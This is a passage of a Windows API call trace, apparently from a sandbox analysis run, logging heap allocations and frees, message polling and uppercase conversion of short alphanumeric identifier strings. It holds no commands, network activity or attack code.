RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71908 [0208.410] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a719a8 [0208.410] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaaba0 [0208.410] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaab88 [0208.410] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a719b8 [0208.410] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaae10 [0208.410] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a719b8 | out: hHeap=0x2af0000) returned 1 [0208.410] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71a28 [0208.410] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a78458 [0208.410] CharUpperBuffW (in: lpsz="SSA1100103809", cchLength=0xd | out: lpsz="SSA1100103809") returned 0xd [0208.410] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a78458 | out: hHeap=0x2af0000) returned 1 [0208.411] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71a28 | out: hHeap=0x2af0000) returned 1 [0208.411] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaae10 | out: hHeap=0x2af0000) returned 1 [0208.411] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaab88 | out: hHeap=0x2af0000) returned 1 [0208.411] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaaba0 | out: hHeap=0x2af0000) returned 1 [0208.411] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a719a8 | out: hHeap=0x2af0000) returned 1 [0208.411] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71908 | out: hHeap=0x2af0000) returned 1 [0208.411] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x38) returned 0x2a5eb40 [0208.411] PeekMessageW (in: lpMsg=0x8cf158, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf158) returned 0 [0208.411] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a5eb40 | out: hHeap=0x2af0000) returned 1 [0208.411] PeekMessageW (in: lpMsg=0x8cf158, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf158) returned 0 [0208.411] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71908 [0208.411] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a780c0 [0208.411] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a719a8 [0208.411] CharUpperBuffW (in: lpsz="A1A0070620F", cchLength=0xb | out: lpsz="A1A0070620F") returned 0xb [0208.411] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a780c0 | out: hHeap=0x2af0000) returned 1 [0208.411] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a719a8 | out: hHeap=0x2af0000) returned 1 [0208.411] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xc) returned 0x2aaac60 [0208.411] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x40) returned 0x2a73fb0 [0208.411] PeekMessageW (in: lpMsg=0x8ced58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ced58) returned 0 [0208.411] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a719a8 [0208.411] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71a08 [0208.411] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaac48 [0208.411] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaad98 [0208.411] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a719b8 [0208.411] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaae10 [0208.411] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a719b8 | out: hHeap=0x2af0000) returned 1 [0208.411] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a719b8 [0208.411] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77fd0 [0208.412] CharUpperBuffW (in: lpsz="SSA1A0070620F", cchLength=0xd | out: lpsz="SSA1A0070620F") returned 0xd [0208.412] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77fd0 | out: hHeap=0x2af0000) returned 1 [0208.412] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a719b8 | out: hHeap=0x2af0000) returned 1 [0208.412] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaae10 | out: hHeap=0x2af0000) returned 1 [0208.412] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaad98 | out: hHeap=0x2af0000) returned 1 [0208.412] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaac48 | out: hHeap=0x2af0000) returned 1 [0208.412] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71a08 | out: hHeap=0x2af0000) returned 1 [0208.412] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a719a8 | out: hHeap=0x2af0000) returned 1 [0208.412] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x38) returned 0x2a5ec80 [0208.412] PeekMessageW (in: lpMsg=0x8ced58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ced58) returned 0 [0208.412] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a5ec80 | out: hHeap=0x2af0000) returned 1 [0208.412] PeekMessageW (in: lpMsg=0x8ced58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ced58) returned 0 [0208.412] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a719a8 [0208.412] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a719b8 [0208.412] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaac18 [0208.412] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaaca8 [0208.412] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a719c8 [0208.412] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaabe8 [0208.412] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a719c8 | out: hHeap=0x2af0000) returned 1 [0208.412] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaabe8 | out: hHeap=0x2af0000) returned 1 [0208.412] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaaca8 | out: hHeap=0x2af0000) returned 1 [0208.412] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaac18 | out: hHeap=0x2af0000) returned 1 [0208.412] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a719b8 | out: hHeap=0x2af0000) returned 1 [0208.412] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a719a8 | out: hHeap=0x2af0000) returned 1 [0208.412] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a73fb0 | out: hHeap=0x2af0000) returned 1 [0208.412] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaac60 | out: hHeap=0x2af0000) returned 1 [0208.412] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71a28 [0208.412] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x18) returned 0x29f7100 [0208.413] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaac18 [0208.413] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaac48 [0208.413] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a719a8 [0208.413] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaac00 [0208.413] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a719a8 | out: hHeap=0x2af0000) returned 1 [0208.413] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaac00 | out: hHeap=0x2af0000) returned 1 [0208.413] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaac48 | out: hHeap=0x2af0000) returned 1 [0208.413] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaac18 | out: hHeap=0x2af0000) returned 1 [0208.413] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29f7100 | out: hHeap=0x2af0000) returned 1 [0208.413] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71a28 | out: hHeap=0x2af0000) returned 1 [0208.413] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71908 | out: hHeap=0x2af0000) returned 1 [0208.413] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x38) returned 0x2a5e940 [0208.413] PeekMessageW (in: lpMsg=0x8cf158, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf158) returned 0 [0208.413] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a5e940 | out: hHeap=0x2af0000) returned 1 [0208.413] PeekMessageW (in: lpMsg=0x8cf158, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf158) returned 0 [0208.413] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a783e0 [0208.413] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71908 [0208.413] CharUpperBuffW (in: lpsz="A5C00800A45", cchLength=0xb | out: lpsz="A5C00800A45") returned 0xb [0208.413] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a783e0 | out: hHeap=0x2af0000) returned 1 [0208.413] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71908 | out: hHeap=0x2af0000) returned 1 [0208.413] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xc) returned 0x2aaab88 [0208.413] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x40) returned 0x2a73e00 [0208.413] PeekMessageW (in: lpMsg=0x8ceef8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ceef8) returned 0 [0208.413] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71908 [0208.413] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a719a8 [0208.413] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaac60 [0208.413] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaadf8 [0208.413] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a719b8 [0208.414] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaad20 [0208.414] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a719b8 | out: hHeap=0x2af0000) returned 1 [0208.414] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a719b8 [0208.414] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a78340 [0208.414] CharUpperBuffW (in: lpsz="SSA5C00800A45", cchLength=0xd | out: lpsz="SSA5C00800A45") returned 0xd [0208.414] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a78340 | out: hHeap=0x2af0000) returned 1 [0208.414] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a719b8 | out: hHeap=0x2af0000) returned 1 [0208.414] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaad20 | out: hHeap=0x2af0000) returned 1 [0208.414] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaadf8 | out: hHeap=0x2af0000) returned 1 [0208.414] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaac60 | out: hHeap=0x2af0000) returned 1 [0208.414] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a719a8 | out: hHeap=0x2af0000) returned 1 [0208.414] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71908 | out: hHeap=0x2af0000) returned 1 [0208.414] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x38) returned 0x2a5e880 [0208.414] PeekMessageW (in: lpMsg=0x8ceef8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ceef8) returned 0 [0208.414] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a5e880 | out: hHeap=0x2af0000) returned 1 [0208.414] PeekMessageW (in: lpMsg=0x8ceef8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ceef8) returned 0 [0208.414] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71908 [0208.414] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaaca8 [0208.414] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaad50 [0208.414] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a719b8 [0208.414] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaab58 [0208.414] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a719b8 | out: hHeap=0x2af0000) returned 1 [0208.414] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaab58 | out: hHeap=0x2af0000) returned 1 [0208.414] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaad50 | out: hHeap=0x2af0000) returned 1 [0208.414] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaaca8 | out: hHeap=0x2af0000) returned 1 [0208.414] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71908 | out: hHeap=0x2af0000) returned 1 [0208.414] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71908 [0208.415] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaabd0 [0208.415] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaab40 [0208.415] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71a48 [0208.415] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaac60 [0208.415] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71a48 | out: hHeap=0x2af0000) returned 1 [0208.415] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaac60 | out: hHeap=0x2af0000) returned 1 [0208.415] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaab40 | out: hHeap=0x2af0000) returned 1 [0208.415] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaabd0 | out: hHeap=0x2af0000) returned 1 [0208.415] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71908 | out: hHeap=0x2af0000) returned 1 [0208.415] PeekMessageW (in: lpMsg=0x8ceef8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ceef8) returned 0 [0208.415] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a73e00 | out: hHeap=0x2af0000) returned 1 [0208.415] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaab88 | out: hHeap=0x2af0000) returned 1 [0208.415] PeekMessageW (in: lpMsg=0x8cf158, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf158) returned 0 [0208.415] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71908 [0208.415] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71908 | out: hHeap=0x2af0000) returned 1 [0208.415] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a5dfa8 | out: hHeap=0x2af0000) returned 1 [0208.415] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaaa50 | out: hHeap=0x2af0000) returned 1 [0208.415] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0208.415] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x38) returned 0x2a5e840 [0208.415] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0208.415] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71908 [0208.415] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71a28 [0208.415] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x18) returned 0x29f7000 [0208.415] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29f7000 | out: hHeap=0x2af0000) returned 1 [0208.415] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71a28 | out: hHeap=0x2af0000) returned 1 [0208.415] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71908 | out: hHeap=0x2af0000) returned 1 [0208.415] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x38) returned 0x2a5e640 [0208.415] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0208.416] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a5e640 | out: hHeap=0x2af0000) returned 1 [0208.416] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0208.416] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71908 [0208.416] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaaa50 [0208.416] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaac00 [0208.416] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a719a8 [0208.416] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a78340 [0208.416] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a719b8 [0208.416] CharUpperBuffW (in: lpsz="A4F00A00447", cchLength=0xb | out: lpsz="A4F00A00447") returned 0xb [0208.416] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a78340 | out: hHeap=0x2af0000) returned 1 [0208.416] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a719b8 | out: hHeap=0x2af0000) returned 1 [0208.416] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xc) returned 0x2aaad08 [0208.416] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x40) returned 0x2a5dfa8 [0208.416] PeekMessageW (in: lpMsg=0x8cef58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cef58) returned 0 [0208.416] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a719b8 [0208.416] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a719e8 | out: hHeap=0x2af0000) returned 1 [0208.416] CharUpperBuffW (in: lpsz="SSA4F00A00447", cchLength=0xd | out: lpsz="SSA4F00A00447") returned 0xd [0208.416] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77f80 | out: hHeap=0x2af0000) returned 1 [0208.418] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a719e8 | out: hHeap=0x2af0000) returned 1 [0208.418] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaade0 | out: hHeap=0x2af0000) returned 1 [0208.418] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaad80 | out: hHeap=0x2af0000) returned 1 [0208.418] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaac30 | out: hHeap=0x2af0000) returned 1 [0208.418] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a719c8 | out: hHeap=0x2af0000) returned 1 [0208.418] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a719b8 | out: hHeap=0x2af0000) returned 1 [0208.418] PeekMessageW (in: lpMsg=0x8cef58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cef58) returned 0 [0208.418] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a5eb40 | out: hHeap=0x2af0000) returned 1 [0208.418] PeekMessageW (in: lpMsg=0x8cef58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cef58) returned 0 [0208.418] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71a28 | out: hHeap=0x2af0000) returned 1 [0208.419] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaacd8 | out: hHeap=0x2af0000) returned 1 [0208.419] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaadb0 | out: hHeap=0x2af0000) returned 1 [0208.419] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaac48 | out: hHeap=0x2af0000) returned 1 [0208.419] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a719c8 | out: hHeap=0x2af0000) returned 1 [0208.419] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a719b8 | out: hHeap=0x2af0000) returned 1 [0208.419] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a5dfa8 | out: hHeap=0x2af0000) returned 1 [0208.419] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaad08 | out: hHeap=0x2af0000) returned 1 [0208.419] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a719a8 | out: hHeap=0x2af0000) returned 1 [0208.419] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a719a8 | out: hHeap=0x2af0000) returned 1 [0208.419] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a719a8 | out: hHeap=0x2af0000) returned 1 [0208.419] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a719a8 | out: hHeap=0x2af0000) returned 1 [0208.419] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaaa50 | out: hHeap=0x2af0000) returned 1 [0208.419] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a719c8 | out: hHeap=0x2af0000) returned 1 [0208.419] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a719a8 | out: hHeap=0x2af0000) returned 1 [0208.419] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71a28 | out: hHeap=0x2af0000) returned 1 [0208.419] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaad80 | out: hHeap=0x2af0000) returned 1 [0208.419] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaad08 | out: hHeap=0x2af0000) returned 1 [0208.419] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaab58 | out: hHeap=0x2af0000) returned 1 [0208.419] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a719a8 | out: hHeap=0x2af0000) returned 1 [0208.419] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a719b8 | out: hHeap=0x2af0000) returned 1 [0208.419] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a78430 | out: hHeap=0x2af0000) returned 1 [0208.419] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a719a8 | out: hHeap=0x2af0000) returned 1 [0208.419] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a719e8 | out: hHeap=0x2af0000) returned 1 [0208.419] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a719b8 | out: hHeap=0x2af0000) returned 1 [0208.419] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaac60 | out: hHeap=0x2af0000) returned 1 [0208.419] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaac30 | out: hHeap=0x2af0000) returned 1 [0208.419] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaae28 | out: hHeap=0x2af0000) returned 1 [0208.420] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a719a8 | out: hHeap=0x2af0000) returned 1 [0208.420] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a719a8 | out: hHeap=0x2af0000) returned 1 [0208.420] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a719b8 | out: hHeap=0x2af0000) returned 1 [0208.420] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaac30 | out: hHeap=0x2af0000) returned 1 [0208.420] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaaba0 | out: hHeap=0x2af0000) returned 1 [0208.420] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaab40 | out: hHeap=0x2af0000) returned 1 [0208.420] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a719a8 | out: hHeap=0x2af0000) returned 1 [0208.420] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a719a8 | out: hHeap=0x2af0000) returned 1 [0208.422] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71a18 | out: hHeap=0x2af0000) returned 1 [0208.422] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x37c0048 | out: hHeap=0x2af0000) returned 1 [0208.422] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a719b8 | out: hHeap=0x2af0000) returned 1 [0208.422] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaabb8 | out: hHeap=0x2af0000) returned 1 [0208.422] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaaba0 | out: hHeap=0x2af0000) returned 1 [0208.422] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a719a8 | out: hHeap=0x2af0000) returned 1 [0208.422] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a719a8 | out: hHeap=0x2af0000) returned 1 [0208.422] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a5dfa8 | out: hHeap=0x2af0000) returned 1 [0208.422] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a719b8 | out: hHeap=0x2af0000) returned 